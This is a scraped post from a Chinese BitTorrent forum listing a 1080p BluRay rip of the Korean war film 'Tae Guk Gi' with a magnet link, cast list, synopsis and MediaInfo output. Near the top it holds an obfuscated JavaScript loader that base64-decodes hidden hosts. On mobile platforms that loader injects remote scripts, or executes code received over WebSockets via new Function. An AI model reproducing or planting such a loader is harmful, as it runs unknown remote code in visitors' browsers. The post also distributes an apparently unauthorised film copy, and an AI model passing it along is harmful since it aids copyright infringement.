太极旗飘扬[中文字幕].Tae.Guk.Gi.The.Brotherhood.of.War.2004.1080p.BluRay.x265.10bit.DTS 9.14GB

版主小s 28天前 391

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 太极旗飘扬 / 太极旗飘扬:生死有情(港) / 太极旗-生死兄弟(台) / 兄弟 / 战火兄弟情 / Brotherhood / Tae Guk Gi: The Brotherhood of War

◎片 名 ??? ????

◎年 代 2004

◎产 地 韩国

◎类 别 剧情 / 动作 / 战争

◎语 言 韩语

◎上映日期 2004-02-06(韩国)

◎IMDb链接 https://www.imdb.com/title/tt0386064/

◎豆瓣评分 8.3/10 (76398人评价)

◎豆瓣链接 https://movie.douban.com/subject/1304972/

◎片 长 148分钟

◎导 演 姜帝圭 Je-gyu Kang (id:1111582)

◎编 剧 姜帝圭 Je-gyu Kang (id:1111582)

韩知勋 Ji-hoon Han (id:1321519)

金相敦 Sang-don Kim (id:1433717)

◎演 员 张东健 Dong-gun Jang (id:1032393)

元斌 Bin Won (id:1016665)

李恩珠 Eun-ju Lee (id:1041710)

孔炯轸 Hyeong-jin Kong (id:1191201)

崔岷植 Min-sik Choi (id:1045142)

全仁杰 In-geol Jeon (id:1448440)

朴东彬 Dong-bin Park (id:1446532)

朴振国 Park Jin-gook (id:1384043)

权泰元 Tae-won Kwon (id:1374616)

韩在民 Jae-min Han (id:1423907)

郑镇 Jung Jin (id:1385237)

金海坤 Hae-gon Kim (id:1400152)

金秀路 Su-ro Kim (id:1045773)

裴长秀 Jang-su Bae (id:1424325)

郑基燮 Gi-seop Jeong (id:1381664)

全宰亨 Jae-hyeong Jeon (id:1381289)

赵胤熙 Yun-hie Jo (id:1029272)

D.C.道格拉斯 D.C. Douglas (id:1087746)

郑斗洪 Doo-hong Jung (id:1109833)

亚当·爱泼斯坦 Adam Epstein (id:1212043)

安吉江 Kil-Kang Ahn (id:1340269)

Jae-hyeong Jeon Jae-hyeong Jeon (id:1011346)

朱雅凛 Ah-reum Joo (id:1459104)

洪坰杓 Kyung-Pyo Hong (id:1286866)

Kyeong-hie Choi Kyeong-hie Choi (id:1307074)

宋闵奎 Min-Gyu Song (id:1359284)

郑斗洪 Doo-hong Jung (id:1109833)

金石源 Suk-won Kim (id:1305145)

李庸基 Yong-Gi Lee (id:1314650)

◎标 签 战争 / 韩国 / 韩国电影 / 张东健 / 人性 / 亲情 / 元彬 / 太极旗飘扬

◎简 介

李镇泰(张东健饰)是生活在汉城的一个修鞋匠,一家人的生计就从修补鞋子的费用维持。虽然物质并不富裕,这却是一个十分温馨完整的家庭。妻子李英顺(李恩珠饰)和母亲开一间面馆,平日还要照顾下面的弟妹,弟弟李镇锡(元彬饰)是家中所有的希望,如今正在高中读书,考上大学是他的梦想,更是哥哥镇泰的寄托所在。

然而随着1950年朝鲜战争突然爆发,平静的生活很快被打乱。战火蔓延汉城,镇泰决定带着家人到大邱去生活,躲避战乱。但在中途,他们却被强行征入军队,押上了开往洛东江前线的列车。从此一家人四分五裂。而在战场上的镇泰只剩下一个愿望:不顾一切用生命保护弟弟,当听说只要获得国家勋章就可以让弟弟免役时,他便疯子般冲在战斗最前沿。然而残酷的战场加上弄人的命运,他们的生命轨迹发生了无可避免的改变。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 112128115596402642988618693108294973352 (0x545B16EC525908C6B00F48DAA61777A8)

  4. Complete name : Tae.Guk.G[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.13 GiB

  8. Duration : 2 h 27 min

  9. Overall bit rate : 8 851 kb/s

  10. Movie name : ??? ???? Blu-ray Disc?

  11. Encoded date : UTC 2021-09-15 08:12:11

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.bmp


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 27 min

  23. Bit rate : 7 301 kb/s

  24. Width : 1 920 pixels

  25. Height : 816 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.194

  33. Stream size : 7.54 GiB (82%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=17.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 2 h 27 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 1.56 GiB (17%)

  54. Language : Korean

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4610 (0x1202)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 2 h 23 min

  66. Bit rate : 20.7 kb/s

  67. Count of elements : 3226

  68. Stream size : 21.2 MiB (0%)

  69. Title : chs

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4611 (0x1203)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 2 h 23 min

  82. Bit rate : 20.9 kb/s

  83. Count of elements : 3226

  84. Stream size : 21.4 MiB (0%)

  85. Title : cht

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #3

  91. ID : 5

  92. ID in the original source medium : 4608 (0x1200)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 2 h 21 min

  98. Bit rate : 23.0 kb/s

  99. Count of elements : 3044

  100. Stream size : 23.3 MiB (0%)

  101. Title : kor

  102. Language : Korean

  103. Default : No

  104. Forced : No

  105. Original source medium : Blu-ray


  106. Text #4

  107. ID : 6

  108. ID in the original source medium : 4609 (0x1201)

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 2 h 24 min

  114. Bit rate : 22.0 kb/s

  115. Count of elements : 2979

  116. Stream size : 22.6 MiB (0%)

  117. Title : eng

  118. Language : English

  119. Default : No

  120. Forced : No

  121. Original source medium : Blu-ray


  122. Menu

  123. 00:00:00.000 : 第 01 章

  124. 00:06:19.708 : 第 02 章

  125. 00:18:01.750 : 第 03 章

  126. 00:25:46.916 : 第 04 章

  127. 00:34:02.083 : 第 05 章

  128. 00:45:39.500 : 第 06 章

  129. 00:58:16.375 : 第 07 章

  130. 01:04:43.583 : 第 08 章

  131. 01:15:07.666 : 第 09 章

  132. 01:22:49.791 : 第 10 章

  133. 01:28:45.541 : 第 11 章

  134. 01:41:33.458 : 第 12 章

  135. 01:50:06.416 : 第 13 章

  136. 01:55:46.000 : 第 14 章

  137. 02:05:35.541 : 第 15 章

  138. 02:20:30.208 : 第 16 章


TAGS 动作 剧情 战争

磁力链:
  • magnet:?xt=urn:btih:CC227074A80ED57A956B5978C3FD4A5E82CE9EB6
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回